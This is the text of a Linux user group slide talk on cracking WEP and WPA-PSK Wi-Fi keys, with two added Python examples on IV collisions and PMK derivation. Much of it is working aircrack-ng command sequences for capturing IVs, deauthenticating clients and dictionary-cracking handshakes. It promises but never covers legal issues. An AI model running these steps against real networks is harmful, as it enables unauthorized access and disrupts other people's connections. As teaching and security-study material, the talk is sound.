Cracking Wireless, Ryan Curtin, LUG@GT (PowerPoint presentation)



Ryan Curtin Cracking Wireless - p. 1

Cracking Wireless

Ryan Curtin

LUG@GT


Goals

By the end of this presentation (if you stay awake), you will:

  • Understand the different types of wireless keys as well as their advantages and disadvantages
  • Understand the legal ramifications of cracking wireless keys
  • Have a basic idea of the theory behind the cracking of each key type
  • Know how to use software to crack wireless keys


Setting Up

Most of the work can be done with the aircrack-ng package. None of these attacks can be performed if you are using ndiswrapper for your network drivers, or other drivers that do not support promiscuous (or monitor) mode.

Starting / stopping promiscuous mode:

airmon-ng stop wlan0
airmon-ng check wlan0
airmon-ng start wlan0 <channel>


Checking Injection

Before starting, make sure your card can inject packets into an AP!

aireplay-ng -9 -e <ESSID> -a <MAC> wlan0

Make sure the percentage of ping replies is not incredibly small, otherwise it may be difficult to collect data.


WEP Encryption

The slide title is not redundant! WEP stands for 'wired equivalent privacy', not 'wireless encryption protocol'.

  • 64-bit or 128-bit keys
  • Uses RC4 stream cipher with CRC-32 checksum
  • Keys have 24-bit IV (initialization vector)
  • 2^24 (16 million) possible IVs
  • 50% probability of repeated IV after only 5000 packets
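The 50% figure is the birthday bound on a 24-bit IV space. The following Python example is added here and is not part of the presentation; it computes that bound, assuming each frame's IV is drawn uniformly at random.

```python
import math

IV_SPACE = 2 ** 24  # WEP initialization vectors are 24 bits wide


def iv_collision_probability(packets: int, space: int = IV_SPACE) -> float:
    """Probability that at least one IV repeats among `packets` frames,
    assuming IVs are chosen uniformly at random (birthday bound:
    P = 1 - exp(-n(n-1) / 2N))."""
    if packets < 2:
        return 0.0
    exponent = packets * (packets - 1) / (2 * space)
    return -math.expm1(-exponent)


def packets_for_collision(prob: float, space: int = IV_SPACE) -> int:
    """Smallest number of frames at which a repeated IV is at least `prob`
    likely. Solves n(n-1)/(2N) = -ln(1-p) for n and rounds up."""
    target = -math.log1p(-prob)  # -ln(1 - p)
    n = (1 + math.sqrt(1 + 8 * space * target)) / 2
    return math.ceil(n)


def expected_repeats(packets: int, space: int = IV_SPACE) -> float:
    """Expected number of colliding IV pairs after `packets` frames: n(n-1)/2N."""
    return packets * (packets - 1) / (2 * space)


if __name__ == "__main__":
    for n in (1000, 5000, 50_000):
        print(f"{n:>6} frames: P(repeat) = {iv_collision_probability(n):.3f}, "
              f"expected repeated pairs = {expected_repeats(n):.1f}")
    print("frames for a 50% chance of a repeat:", packets_for_collision(0.5))
```

Many cards issue IVs sequentially rather than randomly, in which case a repeat is certain once the counter wraps, and sooner if the counter restarts from zero after every reset.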


Cracking WEP

Different methods have been developed:

  • 2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a passive attack
  • 2005: FBI demonstrates WEP cracking in three minutes
  • 2006: Bittau, Handley, and Lackey show that active attacks are possible
  • 2007: Pyshkin, Tews, and Weinmann optimize the active attack ("PTW" attack)


Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel

airodump-ng wlan0

2. Start capture of IVs

airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0

Leave this running! You want to capture around 50k IVs to ensure success (maybe more).

3. Fake authentication with AP

aireplay-ng -1 0 -e <ESSID> -a <MAC> wlan0


Using aircrack-ng (2)

4. Reinject ARP packets to get more IVs

aireplay-ng -3 -b <MAC> wlan0

Run until you have a substantial number of IVs (in your airodump-ng process).

5. Crack the key!

FMS attacks (slow): aircrack-ng -f 1 -F <capture>.cap
PTW attacks (fast!): aircrack-ng -P 2 <capture>.cap


WPA Encryption

WPA with TKIP appeared as an interim solution to the WEP problem while 802.11i was prepared; 802.11i is WPA2.

  • WPA: 'Wi-Fi Protected Access'
  • TKIP: 'Temporal Key Integrity Protocol'
  • TKIP also uses the RC4 cipher (for legacy WEP hardware)
  • Use AES instead if possible!
  • IV length increased to 48 bits
  • WPA-PSK (pre-shared key): common consumer environment setup


Cracking WPA-PSK

The WPA PSK initialization process is reproducible! Therefore, we must capture a WPA handshake and then try to replicate it.


Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel; optional: MAC of a connected client

airodump-ng wlan0

2. Start capture of handshakes

airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0

Leave this running! Watch for "WPA handshake: xx:xx:xx:xx:xx:xx".

3. (Optional) Fake deauthentication of client to trigger handshake

aireplay-ng -0 1 -a <AP MAC> -c <client MAC> wlan0

Watch for a successful ACK in the program output.

4. Brute-force attack on the saved handshake

aircrack-ng -w <dictionary> -b <MAC> <output capture>


Rainbow Tables

Rainbow Tables: a giant collection of precomputed keys for potential common passphrases. Available from:

  • Church of Wifi Rainbow Tables: http://www.renderlab.net/projects/WPA-tables/
  • The Shmoo Group: http://rainbowtables.shmoo.com/
  • Google Search: http://www.google.com/#q=wpa+rainbow+tables
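To show why the WPA-PSK setup is reproducible (the "Cracking WPA-PSK" slide) and why the tables above have to be built per ESSID, here is an added Python example that is not part of the presentation. It derives the WPA/WPA2-PSK pairwise master key as IEEE 802.11i specifies, checks the published "password"/"IEEE" test vector, and shows that the same passphrase under another ESSID gives a different key; the ESSID "linksys" and the guess strings are constructed sample values.

```python
import hashlib
import time


def derive_pmk(passphrase: str, essid: str) -> bytes:
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1 over the passphrase,
    salted with the ESSID, 4096 iterations, 256-bit output (IEEE 802.11i)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def pmk_hex(passphrase: str, essid: str) -> str:
    return derive_pmk(passphrase, essid).hex()


def table_reusable_across_essids(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True only if a PMK precomputed for essid_a is also valid for essid_b.
    The ESSID is the PBKDF2 salt, so this is False whenever the ESSIDs differ,
    which is why WPA rainbow tables are built per ESSID and a non-default
    ESSID makes a generic table useless."""
    return derive_pmk(passphrase, essid_a) == derive_pmk(passphrase, essid_b)


def derivations_per_second(essid: str, samples: int = 200) -> float:
    """Rough single-core rate of PMK derivations, i.e. the cost of testing one
    guess; the 4096 iterations are what make a long passphrase expensive to test."""
    start = time.perf_counter()
    for i in range(samples):
        derive_pmk(f"constructed-guess-{i}", essid)  # constructed sample inputs
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    # Published test vector (IEEE 802.11i Annex H): passphrase "password", SSID "IEEE"
    print(pmk_hex("password", "IEEE"))
    print("PMK for 'IEEE' also valid for 'linksys'?",
          table_reusable_across_essids("password", "IEEE", "linksys"))
    print(f"~{derivations_per_second('IEEE'):.0f} PMK derivations/s on this machine")
```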


Questions and Comments?